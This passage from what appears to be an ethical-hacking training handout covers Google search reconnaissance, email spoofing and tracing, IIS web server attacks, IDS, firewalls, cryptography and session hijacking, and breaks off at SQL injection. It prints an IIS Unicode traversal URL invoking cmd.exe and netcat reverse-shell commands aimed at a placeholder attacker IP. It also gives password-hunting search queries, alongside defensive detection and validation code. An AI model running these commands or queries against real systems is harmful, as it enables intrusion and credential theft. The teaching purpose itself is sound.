filename in the text of the Web page. You can also use filetype and inurl to search for specific
files. To search again for ws_ftp.log files, try a query like filetype:log inurl:ws_ftp.log. This
technique will generally find more results than the somewhat restrictive index.of search.
Server Versioning
One piece of information an attacker can use to determine the best method for attacking a Web
server is the exact software version. An attacker could retrieve that information by connecting
directly to the Web port of that server and issuing a request for the HTTP (Web) headers. It
is possible, however, to retrieve similar information from Google without ever connecting to the
target server. One method involves using the information provided in a directory listing. Notice
that some directory listings provide the name of the server software as well as the version
number in their footer. An adept Web administrator could fake these server tags, but most often this
information is legitimate and exactly the type of information an attacker will use to refine his attack
against the server. The Google query used to locate servers this way is simply an extension of the
intitle:index.of query. The query intitle:index.of "server at" will locate all directory listings on the
Web with index of in the title and server at anywhere in the text of the page. This might not seem
like a very specific search, but the results are very clean and do not require further refinement. To
search for a specific server version, the intitle:index.of query can be extended even further to
something like intitle:index.of "Apache/1.3.27 Server at". In addition to identifying the Web
server version, it is also possible to determine the operating system of the server (as well as
modules and other software that is installed), since Apache's full signature line lists them.
Traversal Techniques
Attackers use traversal techniques to expand a small foothold into a larger compromise. A query
such as intitle:index.of inurl:"/admin/*" helps with traversal because the listing it finds exposes
the parent and sibling directories, which can then be walked by hand.
Site Operator
The site operator is absolutely invaluable during the information-gathering phase of an assessment.
A site search can be used to gather information about the servers and hosts that a target runs. Using
simple reduction techniques, you can quickly get an idea about a target's online presence. Consider
the simple example of site:washingtonpost.com -site:www.washingtonpost.com. This query
effectively locates pages on the washingtonpost.com domain other than www.washingtonpost.com.
login | logon
Login portals can reveal the software and operating system of a target, and in many cases "self-
help" documentation is linked from the main page of a login portal. These documents are designed
to assist users who run into problems during the login process. Whether the user has forgotten his
or her password or even username, this document can provide clues that might help an attacker.
Documentation linked from login portals lists e-mail addresses, phone numbers, or URLs of human
assistants who can help a troubled user regain lost access.
admin | administrator
The word administrator is often used to describe the person in control of a network or system. The
word administrator can also be used to locate administrative login pages, or login portals. The
phrase Contact your system administrator is a fairly common phrase on the Web, as are several
basic derivations. A query such as "please contact your * administrator" will return results that
reference local, company, site, department, server, system, network, database, e-mail, and even
tennis administrators. If a Web user is told to contact an administrator, chances are that the data has
at least moderate importance to a security tester.
Searching for Passwords
Password data, one of the "Holy Grails" during a penetration test, should be protected.
Unfortunately, many examples of Google queries can be used to locate passwords on the Web.
Google Hacking Database
The Google Hacking Database (GHDB) contains queries that identify sensitive data such as portal
logon pages, logs with network security information, and so on. Visit http://johnny.ihackstuff.com
Windows Registry Entries Can Reveal Passwords
A query like filetype:reg intext:"internet account manager" could reveal exported registry keys
containing mail account settings and password data.
6. EMAIL ATTACKS
Working of Emails:
Email sending and receiving is handled by Email servers. Every Email service provider must
configure an Email server before anyone can sign in to an account and start communicating
digitally. Once the servers are ready, users from across the world register with these Email
servers and set up an Email account. When they have a fully working Email account, they sign in
and start communicating with other users through the Email service.
Email Travelling Path:
Let's say we have two Email providers, Server1.com and Server2.in. ABC is a registered user of
Server1.com and XYZ is a registered user of Server2.in. ABC signs in to his Email account at
Server1.com, writes a mail to [email protected], clicks Send and gets the message that the Email
was sent successfully. Behind the curtains, the Email from the computer of [email protected] is
forwarded to the Email server of Server1.com. Server1 then looks up Server2.in on the Internet
(via DNS) and forwards the Email to Server2.in for the account of XYZ. Server2.in receives the
Email from Server1.com and puts it in the mailbox of XYZ. XYZ then sits at her computer and
signs in to her Email account; the message is now in her inbox.
[Figure: Email travelling path. ABC at SERVER1.com sends through the ISP to XYZ at SERVER2.in]
Email Service Protocols:
SMTP
SMTP stands for Simple Mail Transfer Protocol. SMTP is used when Email is
delivered from an Email client, such as Outlook Express, to an Email server or when
Email is delivered from one Email server to another. SMTP uses port 25.
POP3
POP3 stands for Post Office Protocol version 3. POP3 allows an Email client to download
Email from an Email server. The POP3 protocol is simple and does not offer many
features beyond download. Its design assumes that the Email client downloads all
available Email from the server, deletes it from the server and then disconnects. POP3
normally uses port 110.
IMAP
IMAP stands for Internet Message Access Protocol. IMAP shares many similar
features with POP3. It, too, is a protocol that an Email client can use to download Email
from an Email server. However, IMAP includes many more features than POP3. The
IMAP protocol is designed to let users keep their Email on the server. IMAP requires
more disk space on the server and more CPU resources than POP3, as all Emails are
stored on the server. IMAP normally uses port 143.
Email Server Configuration:
Email server software like PostCast Server, hMailServer, SurgeMail, etc. can be used to turn
your desktop PC into an Email sending server. hMailServer is an Email server for Microsoft
Windows. It allows you to handle all your Email yourself without having to rely on an Internet
service provider (ISP) to manage it. Compared to letting your ISP host your Email, hMailServer
adds flexibility and security and gives you full control over spam protection.
Email Security:
Now let's check how secure this fast means of communication is. Many attacks are applied to
Email. There are people who are masters of these Email attacks, and they always look for
innocent users who are not aware of these tricks and are ready to fall into their trap. You have
to make sure that you are not an easy target for those people: secure your mail identity and
profile and make yourself a tough target. If you have an Email ID, do not think it does not
matter if it gets hacked because there is no important information in that Email account. You do
not know whether someone who gets your Email password will use your Email to send a
threatening Email to a ministry or to a news channel. The attacker is not bothered about the data
in your Email; he just wants a victim Email ID that can be used in an attack. There are many
ways in which your Email can be misused. You may well have come across cases where a
student gets an abusive Email from a friend, or cases of pornographic Emails where the owner of
the account knows nothing about the sent Email.
Email Spoofing:
Email spoofing is the forgery of an Email header so that the message appears to have originated
from someone or somewhere other than the actual source. Distributors of spam often use spoofing
in an attempt to get recipients to open, and possibly even respond to, their solicitations. Spoofing
can also be used legitimately. There are many ways to send fake Emails even without knowing
the password of the Email ID. The Internet is so vulnerable that anybody's Email ID can be used
to send a threatening Email to an official.
Fake Email- Open Relay Server:
An open mail relay is an SMTP (Simple Mail Transfer Protocol) server configured in such a way
that it allows anyone on the Internet to send Email through it, not just mail destined 'To' or
'Originating' from known users. An attacker can connect to the open relay server via Telnet and
instruct the server to send the Email. An open relay Email server requires no password to send
Email.
Fake Email- Web Script:
Web programming languages such as PHP and ASP contain mail-sending functions which can
be used to send Emails with forged headers, i.e. "From:", "To:", "Subject:". There are many
websites on the Internet which already host such mail-sending scripts. Most of them
provide the service for free. Some free anonymous Email websites are:
Mail.Anonymizer.name (Send attachments as well)
FakEmailer.net
FakEmailer.info
Deadfake.com
Fake Email- Consequences:
An Email from your Email ID to a security agency declaring a bomb blast can make you
spend the rest of your life behind iron bars.
An Email from you to your girlfriend or boyfriend can cause a break-up and set your
friend up to be in that relationship.
An Email from your Email ID to your boss carrying your resignation letter, or anything else
you can think of.
Any number of cases can be built on fake Emails.
Fake Email- Proving:
Every Email carries a header which has information about the travelling path of the Email.
Check the header and get the location from which the Email was sent.
Check whether the Email was sent from another Email server or from a website.
Headers carry the name of the website on which the mail-sending script was used.
Email Bombing:
Email bombing is repeatedly sending an identical Email message to a particular address at a
specific victim site. In many instances, the messages will be large and constructed from
meaningless data in an effort to consume additional system and network resources. Multiple
accounts at the target site may be abused, increasing the denial-of-service impact.
Email Spamming:
Email spamming is a variant of bombing; it refers to sending Email to hundreds or thousands of
users (or to lists that expand to that many users). Email spamming can be made worse if recipients
reply to the Email, causing all the original addressees to receive the reply. It may also occur
innocently, as a result of sending a message to mailing lists and not realizing that the list explodes
to thousands of users, or as a result of a responder message (such as vacation(1)) that is set up
incorrectly.
Email Password Hacking:
There is no specific attack available just to hack the password of an Email account. Also, it is not
easy to compromise an Email server like Yahoo, Gmail, etc. Email password hacking is
accomplished via client-side attacks: we try to compromise the user and capture the password of
the Email account before it reaches the intended Email server.
Phishing Attack
The act of sending an Email to a user, falsely claiming to be an established legitimate enterprise, in
an attempt to scam the user into surrendering private information that will be used for identity theft.
The Email directs the user to visit a Web site where they are asked to update personal information,
such as passwords and credit card, social security, and bank account numbers, that the legitimate
organization already has. The Web site, however, is bogus and set up only to steal the user's
information.
Phishing scams could be:
Emails inviting you to join a social group, asking you to log in using your username
and password.
An Email saying that your bank account is locked and that you must sign in to your account to
unlock it.
Emails containing some information of your interest and asking you to log in to your
account.
Any Email carrying a link to click and asking you to log in.
Prevention against Phishing
Read every Email carefully and check that the sender is genuine.
Look at the link carefully before clicking.
Always check the URL in the browser before signing in to your account.
Always log in to your accounts by opening the trusted website yourself, not by clicking a link in
any other website or Email.
Email Tracing:
Tracing an Email means locating the original sender and learning the IP address of the
network from which the Email was actually generated. To get information about the sender of
the Email we first must know the structure of the Email; the travelling path was covered above.
Each message has exactly one header, which is structured into fields. Each field has a name
and a value. The header of the Email contains all the valuable information about the path and the
original sender of the Email.
Check the headers in different Email service providers.
Locating the Sender.
You can easily get the IP address of the sender from the header and then locate
the sender.
Once you have the IP address of the sender, go to the URL www.ip2location.com and
find the location of the IP address.
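An added example (not from the workshop material) of reading the travelling path out of the header: it parses the Received: lines of a constructed message that followed the Server1.com to Server2.in path above and returns the IP the first mail server recorded for the sending machine. The hostnames, IPs and the message itself are made up.

```python
"""Walk the Received: headers of a message to find where it was first handed in.

Added example, not from the workshop material. The message is constructed:
hosts, IPs (documentation ranges) and addresses are made up, following the
Server1.com / Server2.in path described in the text.
"""
import re
from email import message_from_string

# Constructed raw message as XYZ's mailbox at Server2.in would store it.
# Each mail server prepends its own Received: line, so the top one is the
# last hop and the bottom one is the first server the sender's machine hit.
RAW_MESSAGE = """\
Received: from mail.server1.com (mail.server1.com [203.0.113.10])
\tby mx.server2.in with ESMTP id 4Xk2b; Mon, 1 Jan 2024 10:00:05 +0000
Received: from abc-laptop (isp-dyn-42.example.net [198.51.100.42])
\tby mail.server1.com with ESMTP id 9Qz7; Mon, 1 Jan 2024 10:00:01 +0000
From: abc@server1.com
To: xyz@server2.in
Subject: hello

body text
"""

# "from <host> ... by <host>" inside one Received: value (may be folded).
HOP = re.compile(r"from\s+(\S+).*?by\s+(\S+)", re.S)
# The receiving server writes the peer's address in square brackets.
IP_IN_BRACKETS = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def received_hops(raw):
    """Received: header values in travel order (first hop first)."""
    msg = message_from_string(raw)
    return list(reversed(msg.get_all("Received", [])))


def trace(raw):
    """List of (from_host, by_host, from_ip) per hop, first hop first."""
    hops = []
    for hdr in received_hops(raw):
        names = HOP.search(hdr)
        ip = IP_IN_BRACKETS.search(hdr)
        hops.append((names.group(1) if names else "?",
                     names.group(2) if names else "?",
                     ip.group(1) if ip else None))
    return hops


def originating_ip(raw):
    """IP the first mail server logged for the sending machine, or None.

    Only the Received: lines added by servers you trust are evidence: anything
    below the first trusted server's own line could have been written by the
    sender, which is how spoofed mail tries to mislead a trace.
    """
    for _src, _dst, ip in trace(raw):
        if ip:
            return ip
    return None


if __name__ == "__main__":
    for src, dst, ip in trace(RAW_MESSAGE):
        print(f"{src} [{ip}] -> {dst}")
    print("originating IP:", originating_ip(RAW_MESSAGE))
```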
Securing Your Email Account:
Always configure a secondary Email address for recovery purposes.
Properly configure the security question and answer in the Email account.
Do not open Emails from strangers.
Do not use anyone else's computer to check your Email.
Be careful with phishing links.
Do not reveal your passwords to your friends or mates.
7. WEBSITE ATTACKS
Hacking Web Servers
Web hacking is a critical topic because much of the Internet is devoted to e-commerce. This traffic
is typically allowed through a firewall or border router, so there is considerable risk involved.
Web Server Identification
While standard web servers run on ports 80 (HTTP) or 443 (HTTPS), there are other ports that
should be scanned for when looking for web-based applications. These include the following:
88 – Kerberos
2779 - Windows 2000 Web Server
8080 – Squid
8888 – Alternate Web Server
Some of the most popular tools used to scan for these services include: Nmap, Netscan
Tools and Superscan.
Web Server Enumeration
Once possible web servers have been identified, the attacker will usually attempt to enumerate the
web server vendor. The most popular web servers include: IIS Web Server, Apache Web Server
and Sun ONE Web Server. Common tools used to determine what the web server is running
include: Nmap, Telnet, and web sites such as Netcraft.
Vulnerability Identification
Once the attacker has identified the vendor and version of the web server, he will then search for
vulnerabilities. Some of the sites the attacker and security administrators would most likely visit to
identify possible vulnerabilities include:
http://www.packetstormsecurity.com
http://icat.nist.gov/icat.cfm
http://neworder.box.sk
The security administrator should also consider running an automated vulnerability scanning
software package. Several of these are worth mentioning: WebInspect, Whisker, N-Stealth
Scanner, Nessus and Shadow Security Scanner.
Vulnerability Exploitation
IIS may seem to be the target of many attacks, but this is partly because it is so widely
used. Others, such as Apache, have also been targeted and have their share of
vulnerabilities. Attackers take the path of least resistance; if that happens to be the web server,
expect it to be targeted. Some common exploits are discussed below.
ISAPI DLL Buffer Overflows
This exploit targets idq.dll. When executed, this attack can lead to a buffer overflow that can
compromise servers running IIS. What makes this vulnerability particularly malicious is that the
service, part of IIS Indexing, does not even need to be running. Because idq.dll runs as
SYSTEM, the attacker can easily escalate his privilege and add himself to the administrators group.
IPP Printer Overflow
This buffer overflow attack also targets the ISAPI filter (msw3prt.dll) that handles printer files. If
the buffer sent is at least 420 characters, it will overflow and may return a command
prompt to the attacker. There are several tools available to exploit this vulnerability; jill-win32
is one example.
ISAPI DLL Source Disclosure
Because of vulnerabilities in the ISM.dll, IIS4 and IIS5 can be made to disclose source data, rather
than executing it. An attacker accomplishes this by appending +.htr to the global .asa file.
IIS Directory Traversal
This vulnerability allows an attacker to back out of the current directory and go wherever he would
like within the logical drive's structure. Two iterations of this attack are:
Unicode
Double Decode
These attacks are possible because of the way in which Unicode is parsed. These overly long
strings (as shown below) bypass the filters that are designed to check only short Unicode.
http://target//vulnerablefolder/..%c0%af..%c0%af..%c0%af..%c%af../winnt/system32/cmd.exe?/c+dir+c:\
Directory Listing
The attacker can then place this Unicode string in the browser or script the attack with a tool such
as NetCat. If the attacker can access cmd.exe, he is only a few steps away from owning the box.
Back in 2001, the Nimda worm used this same vulnerability to ravage web servers.
Shoveling the Shell
For the final step, the attacker needs only to complete the following two steps. At that point, a
command shell will be returned to his computer with system privileges.
Execute nc.exe -l -p <Open Port> from the attacker's computer.
Execute nc.exe -v -e cmd.exe AttackerIP <Open Port> from the compromised server.
Escalating Privileges on IIS
Some well-known privilege escalation tools are: GetAdmin, HK, PipeupAdmin and IIScrack.dll
(httpodbc.dll). This completes the system hack, as the attacker now has administrator privileges on
the computer.
Clearing IIS Logs
Just as with any other attack, expect the attacker to attempt to remove or alter the log files located
at C:\Winnt\system32\Logfiles\W3SVC1, as they will most likely have a record of the attacker's
IP address.
File System Traversal Countermeasures
Countermeasures include:
Apply current patches
Move cmd.exe
Separate the OS and Applications by using two logical partitions
Remove executable permissions from the IUSR account
Securing IIS
As always, the best defense is a good offense. So, there is never going to be a better time than now
to make sure your web server is locked down. There are some good tools available for you to
accomplish this task.
UpdateExpert
Microsoft HotFix Checker
IIS Lockdown
Microsoft Baseline Security Analyzer
Cacls
Web Application Vulnerabilities
Footprinting
The methodology for assessing web applications is the same as all of the other services we have
examined. The attacker will attempt to gather as much information as possible about the site, as to
understand its function, design, and purpose. One good tool that can be used to gather information
is Instant Source.
Directory Structure
The most efficient way to determine the directory structure is with the use of a site ripping tool.
Site ripping tools allow the attacker to download the entire site locally. Once the site has been
duplicated, the attacker can start to examine the directory structure, make an analysis of the site
design, perform source sifting, and look for clues that can identify the type of underlying web
applications. Some excellent site ripping tools include: Wget, Black Widow and WebSleuth.
Documenting the Application Structure
Once the underlying applications have been uncovered, the attacker can then search the web to
look for vulnerabilities. If vulnerabilities are present, the attacker will also check the web
application vendors' web site. Many times, vendors are so proud of their products, they will list all
of their clients. This list of clients can be used to immediately target other vulnerable web sites.
Input Validation
Another huge problem with web applications is that of client-side data. Any time data is passed
from the client to the server, it must be checked. Without proper input validation, the web
application can be tricked into accepting invalid input.
Hidden Value Fields
Hidden value fields are embedded inside of the html code. The theory is that if end users cannot
see it, it is safe from tampering. The flaw in that logic is that anyone that views the page source
can see the hidden fields. Many sites use these hidden value fields to store the price of the product
that is passed to the web application. If the attacker saves the web page locally and then modifies
the amount, the new value will be passed to the web application. If no input validation is
performed, the application will accept the new, manipulated value.
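An added example (not from the workshop material) showing the hidden price field as anyone viewing the page source sees it, the flawed checkout that believes it, and the server-side check that makes an edited value harmless. The form, catalogue, prices and field names are constructed for illustration.

```python
"""Price from a hidden form field: trusting it versus validating it server-side.

Added example, not from the workshop material. The HTML form, catalogue and
prices are constructed for illustration; the form field names are assumed.
"""
from decimal import Decimal
from html.parser import HTMLParser

# Constructed catalogue: the server's own authoritative record of prices.
CATALOGUE = {"SKU-1001": Decimal("499.00"), "SKU-1002": Decimal("19.99")}

# Constructed checkout page as served: the price rides along in a hidden field.
ORDER_FORM = """<form action="checkout.asp" method="post">
<input type="hidden" name="sku" value="SKU-1001">
<input type="hidden" name="price" value="499.00">
<input type="text" name="qty" value="1">
</form>"""


class HiddenFieldParser(HTMLParser):
    """Collects name=value of every hidden input, exactly what 'view source' shows."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden":
            self.fields[a.get("name")] = a.get("value")


def hidden_fields(html):
    """Return {name: value} for the hidden inputs in a page."""
    parser = HiddenFieldParser()
    parser.feed(html)
    return parser.fields


def total_trusting_client(form):
    """The flawed pattern: whatever price the client posts is what gets charged."""
    return Decimal(form["price"]) * int(form["qty"])


def total_validated(form):
    """Ignore the posted price; charge the catalogue price and bound the quantity."""
    sku = form.get("sku")
    if sku not in CATALOGUE:
        raise ValueError("unknown item")
    qty = int(form.get("qty", "0"))
    if not 1 <= qty <= 100:
        raise ValueError("quantity out of range")
    return CATALOGUE[sku] * qty


def price_tampered(form):
    """True when the posted hidden price disagrees with the catalogue (worth logging)."""
    sku = form.get("sku")
    if sku not in CATALOGUE:
        return True
    try:
        return Decimal(form.get("price", "")) != CATALOGUE[sku]
    except ArithmeticError:  # Decimal("") and the like raise InvalidOperation
        return True


if __name__ == "__main__":
    honest = dict(hidden_fields(ORDER_FORM), qty="1")
    edited = dict(honest, price="1.00")  # the locally saved and modified copy
    print("trusting client:", total_trusting_client(edited))
    print("validated:", total_validated(edited), "tampered:", price_tampered(edited))
```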
Cross Site Scripting
Another popular web application hack is cross-site scripting. Web applications that use cookies
and fail to properly identify the user are potentially vulnerable. Sending the victim an e-mail with
a malicious link embedded is the way this attack is committed. Victims that fall for the ruse and
click on the link will have their credentials stolen. Sites running PHPnuke have been particularly
hard hit by this attack.
Cross-Site Scripting Countermeasures
This attack, like others, can be prevented. Consider the following:
Patch the program
Validate all input that your dynamic page receives
Be leery of embedded links
Disable scripting language support
Web Based Password Cracking Techniques
Authentication Types
Authentication types include:
Basic
Message Digest
Certificate
Microsoft Passport
Forms Based
You should be familiar with the details of each of these authentication types.
Web-based Password Cracking
There are an unlimited number of tools available to the attacker to attempt to break into web-based
applications. If the site does not employ a lockout policy, it is only a matter of time and bandwidth
before the attacker can gain entry. Some of these password cracking tools are: WebCracker,
Brutus, ObiWan, Munga, Bunga, Variant and PassList.
Stealing Cookies
If the attacker can gain physical access to the victim's computer, then there are various tools that
can be used to steal cookies or to view hidden passwords. These include the following:
CookieSpy and SnadBoy.
Buffer Overflows
Poorly written programs and the lack of boundary checking can cause buffer overflows. Anytime
bad data can be entered into an application that causes it to crash, blue screen, or drop to
root prompt, there's a problem! Buffer overflows can result in:
Attackers being able to run their code in privileged mode access
Freezing, rebooting, data corruption, or lockup of the attacked system
Exploitation
Many of today's most popular attacks are the result of buffer overflows. These include:
Jill-Win32 – IIS Buffer Overflow Attack
SQL2.exe – SQL Buffer Overflow Attack
WSFTP – DoS Buffer Overflow Attack
Named NXT – BIND Buffer Overflow Attack
While you may never write a buffer overflow program, you should be familiar with its structure.
Detecting Buffer Overflows
There are two primary ways to detect buffer overflows:
Proactive - Have an experienced programmer examine the code to verify it is written
correctly;
Reactive – Release a faulty program and wait until the attacker attacks the application by
feeding it long strings of data and observing its reaction.
Skills Required to Exploit Buffer Overflows
The skills required to exploit a buffer overflow include:
Knowledge of the Stack
Assembly Language
C Programming
The ability to guess key parameters
Defense Against Buffer Overflows
The best defense against buffer overflows is to start with a robust and secure program. Safer C
program calls should be used and the finished code should be audited. When dealing with pre-
compiled programs, you should always make sure the latest patches are applied and that the
program is executed at the least possible privilege.
Tools for Compiling Robust Code
Some of the tools available to ensure robust code include:
StackGuard
Immunix
IDS, Firewalls & Honeypots
Intrusion Detection Systems
IDS systems can be software or hardware based. While some are simple software applications,
others are high-end hardware based products. No matter what the platform, they share a common
purpose, which is to monitor events on hosts or networks and notify security administrators in
the event of an anomaly. IDS systems come in two basic types:
Anomaly Detection
Signature Recognition.
Anomaly Detection
This method of monitoring works by looking for traffic that is outside the bounds of normal
traffic. While this works well, it can be fooled by slowly changing traffic patterns. This can
sometimes fool the IDS into believing the illicit traffic is acceptable.
Signature Recognition
This method of monitoring works by comparing traffic to known attack signatures. It is as
effective as its most current update. It cannot detect an attack that is not in its database. While
signature and anomaly based IDS systems are the most commonly deployed types, other hybrid
IDS systems, such as honeypots, can be useful tools in detecting potential security breaches.
IDS Signature Matching
Signature matching works by capturing traffic and examining it to make sure that it complies with
known:
Protocol Stack Rules
Application Protocol Rules
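As an added example of application-protocol signature matching (not from the workshop material), here is a check run over constructed W3C-format web log lines for the IIS Unicode and double-decode traversal requests described under Web Server attacks. The log field order is an assumption about how the server was configured.

```python
"""Application-protocol signature: IIS Unicode / double-decode traversal in web logs.

Added example, not from the workshop material. The log lines are constructed
in a W3C extended format (date time c-ip cs-method cs-uri-stem cs-uri-query
sc-status); that field order is an assumption about the server's log config.
"""
import re
from urllib.parse import unquote_to_bytes

# Constructed sample lines in the style of W3SVC1 logs (IPs from documentation ranges).
LOG_LINES = [
    "2001-09-18 10:00:01 198.51.100.7 GET /index.htm - 200",
    "2001-09-18 10:00:02 198.51.100.9 GET "
    "/scripts/..%c0%af..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200",
    "2001-09-18 10:00:03 198.51.100.9 GET "
    "/scripts/..%255c..%255c../winnt/system32/cmd.exe /c+dir 404",
    "2001-09-18 10:00:04 198.51.100.3 GET /images/logo.gif - 200",
]

LOG_FIELDS = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\S+) (\d+)$")
# A two-byte UTF-8 sequence with lead byte C0/C1 is always an overlong encoding
# of an ASCII character; %c0%af is "/" written this way, which is what slipped
# past a filter that only looked for the short form.
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]")
TRAVERSAL = re.compile(r"\.\.[/\\]")


def canonicalize(path: str) -> str:
    """Decode the way the vulnerable server effectively did: percent-decode
    twice (the double-decode case) and fold overlong UTF-8 back to ASCII."""
    raw = path.encode("latin-1")
    for _ in range(2):
        raw = unquote_to_bytes(raw)
    raw = OVERLONG.sub(
        lambda m: bytes([((m.group(0)[0] & 0x1F) << 6) | (m.group(0)[1] & 0x3F)]),
        raw)
    return raw.decode("latin-1")


def is_traversal(path: str) -> bool:
    """Signature: the decoded path climbs out of its directory or names cmd.exe."""
    p = canonicalize(path)
    return bool(TRAVERSAL.search(p)) or p.lower().endswith("cmd.exe")


def find_traversal_hits(lines):
    """(client ip, decoded path, status) for every matching request.

    The status is kept because a 200 on such a request means it succeeded and
    the host needs incident handling, not just a firewall rule."""
    hits = []
    for line in lines:
        m = LOG_FIELDS.match(line)
        if not m:
            continue
        _ts, ip, _method, stem, _query, status = m.groups()
        if is_traversal(stem):
            hits.append((ip, canonicalize(stem), int(status)))
    return hits


if __name__ == "__main__":
    for ip, path, status in find_traversal_hits(LOG_LINES):
        print(f"{ip} {status} {path}")
```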
IDS Software Vendors
There are many vendors for IDS systems. As a security administrator, your biggest concern should
be who will watch over and administrate the IDS. As once stated, "IDS systems are like 3-year-
old children as they require constant attention." If you are not able to provide that amount of
attention and manpower, consider outsourcing the task to a qualified third party. Some well-known
IDS products include: SNORT, Cybercop, RealSecure and BlackIce.
Evading IDS
An attacker can use a host of programs to attempt to evade an IDS. He may even encrypt his data
to prevent an IDS from analyzing its content. Some of the tools an attacker may use to try and fool
an IDS include: Fragrouter, TCPReplay, SideStep, NIDSbench and ADMutate.
Hacking Through Firewalls
Firewalls function primarily by one of the three following methods:
Packet Filtering
NAT
Proxy
While it is not always possible to hack through firewalls, there are tools and techniques available to
determine their manufacturer, presence, and rule set. There are also ways to detect firewalls. As
an example, whenever you perform a traceroute and notice that the two final hops show the same
IP address, it's probable that you are dealing with a stateful inspection firewall. At this point, you
may want to try to connect. Many firewalls will divulge their presence by simply connecting to
them. Use tools such as Telnet and FTP to attempt a banner grab from the firewall. Tools such as
firewalk can be used to further enumerate the firewall's rule set. Firewalk works by tweaking
the IP TTL value, so that packets expire one hop beyond the gateway. Finally, Nmap is
another valuable tool that shouldn't be overlooked. It too, can be used to attempt enumeration of
the firewall. Nmap's reported results, be it open, closed, or filtered, can tell the attacker a lot
about the firewall's architecture. Filtered messages are commonly returned when Nmap receives
an ICMP type 3 Code 13 response. Reference RFC 792 to learn more about how ICMP functions.
http://www.faqs.org/rfcs/rfc792.html
Placing Backdoors Behind Firewalls
A much easier technique than hacking through the firewall, is to simply place a backdoor behind it.
Firewalls cannot deny what they must permit. There will usually be several ports open for the
skilled attacker to use. These include:
UDP 53 – DNS
TCP 25 - SMTP
TCP 80 – HTTP
ICMP 0/8 – Ping
Hiding Behind Covert Channels
Using one of these open ports is a good way for the attacker to covertly send data out of the
organization. Some of the tools commonly used here include:
NetCat – Can use any TCP/UDP open port
CryptCat – Same as NetCat, but carries the payload in an encrypted format
ACK CMD - Uses TCP ACKs as a covert channel
Loki – Uses ICMP as a covert channel. Looks like common ping traffic
Reverse WWW Shell – Uses HTTP as a covert channel
Honeypots
Honeypots are systems that contain phony files, services, and databases. They are deployed to
distract the attacker from the real target and give the administrator enough time to be alerted. For
these lures to be effective, they must adequately persuade the attacker that he has discovered a real
system. Products such as Network Associates' CyberCop Sting, simulate an entire network,
including routers and hosts that are actually all located on a single computer.
Honeypot Vendors
There are many honeypot vendors. The two most important issues with honeypots are entrapment
and enticement. Some honeypot vendors are listed below for your review. Each link offers good
information about this fascinating subject.
Deception Toolkit - http://www.all.net/dtk/index.html
HoneyD - http://www.citi.umich.edu/u/provos/honeyd/
LaBrea Tarpit - http://www.hackbusters.net
ManTrap - http://www.symantec.com
Single-Honeypot - http://www.sourceforge.net/projects/single-honeypot/
Smoke Detector - http://palisadesys.com/products/smokedetector/
Specter - http://www.specter.ch
Cryptography
PKI
Public key infrastructure provides a variety of valuable security services, such as key
management, authorization, and message integrity through the use of digital signatures. PKI
also extends a fourth basic feature to the security triad, that of non-repudiation:
Confidentiality
Integrity
Authentication
Non-repudiation
X.509 is one of the key standards that govern the use of PKI.
Digital Certificates
A digital certificate is a record used for authentication and encryption. It serves as a basic
component of PKI. RSA is the default encryption standard used with digital certificates and when
the certificate is requested from a CA (Certificate Authority), the request is comprised of the
following four fields:
The DN (Distinguished Name) of the CA
The Public key of the user
Algorithm identifier
The user's Digital signature
RSA is a public key cryptosystem in which one key is used for encryption (public key) and the
other is used for decryption (private key). RSA (Rivest Shamir Adleman) was developed in 1977
to help secure Internet transactions.
Hashing Algorithms
Hashing algorithms can be used for digital signatures or to verify the validity of a file. It is a one-
way process and is widely used.
MD5 – 128 bit message digest
SHA - 160 bit message digest
SSL
Netscape developed SSL (Secure Sockets Layer) and almost all browsers and web servers support
it. SSL's focus is on securing web transactions. The client is responsible for creating the session
key after the server's identity has been verified. SSL is limited in strength by the cryptographic
tools on which it is based.
PGP
PGP (Pretty Good Privacy) is a public encryption package that allows individuals to encrypt e-
mail and other personal data.
SSH
SSH (Secure Shell) is an excellent replacement for Telnet and FTP. It operates on port 22 and is
available in two versions: SSH and SSH2.
Session Hijacking
Spoofing Vs Hijacking
Spoofing is the act of masquerading as another user, whereas session hijacking attempts to
attack and take over an existing connection. The attacker will typically intercept the established
connection between the authorized user and the service, then take over the session
and assume the identity of the authorized user. Session hijacking attacks can range from basic
sniffing, to capture the authentication between a client and server, to hijacking the established
session to trick the server into thinking it still has a legitimate session with the client.
Session Hijacking Steps
To successfully hijack a session, several items must come into place.
The attacker must be able to track and intercept the traffic
The attacker must be able to desynchronize the connection
The attacker must be able to inject his traffic in place of the victim's
If successful, the attacker can then simply sit back and observe or actively take over the
connection.
Passive Session Hijacking – The process of silently sniffing the data exchange between the user
and server.
Active Session Hijacking – The process of killing the victim's connection and hijacking it for
malicious intent.
TCP Concepts
To understand hijacking, you must know how TCP functions. As TCP is a reliable service, a 3-
step startup is performed before data is transported.
TCP 3-step startup
Before two computers can communicate, TCP must set up the session. This setup is comprised of
three steps. Once these three steps are completed, the two computers can exchange data. The 3-
step startup is shown below:
Client --SYN--> Server
Client <--SYN/ACK-- Server
Client --ACK--> Server
Sequence Numbers
During the first two steps of the three-step startup, the two computers that are going to
communicate exchange sequence numbers. These numbers enable each computer to keep track of
how much information has been sent and the order in which the packets must be reassembled. An
attacker must successfully guess the sequence number to hijack the session.
Session Hijacking Tools
There are many tools available to hijack a session. Some of these tools include:
Juggernaut
Hunt
SolarWinds
TCP Session Reset Utility
Session Hijacking Countermeasures
Session hijacking is not one of the easiest attacks for an attacker to complete. It can, however,
have disastrous results for the victim if successful. Organizations should consider replacing clear-
text protocols, such as FTP and Telnet, with more secure protocols such as SSH. Also,
controls such as time stamps, sequence numbers, and digital signatures can be
used to prevent replay attacks.
SQL Injection
Some organizations are so focused on their web servers that they may never realize that the
attacker may have another target in mind. The organization's most valuable assets are not on the
web server, but contained within the company's database. This juicy target can contain customer
data, credit card numbers, passwords, or other corporate secrets. Attackers search for and exploit
databases that are susceptible to SQL injection. SQL injection occurs when an attacker is able
to insert SQL statements into a query by means of a SQL injection vulnerability.
SQL injection, as the name suggests, is a type of attack in which the attacker injects
specially crafted Structured Query Language (SQL) code through a web browser to gain access
to resources or to change data. It is a technique of injecting SQL commands to exploit
non-validated input in a web application's database access. Programmers build queries by
stringing commands together with user input, which makes it easy for attackers to inject commands
quickly and accurately. The attack takes advantage of unsafe, dynamically built SQL queries in
web applications.
SQL Insertion Discovery
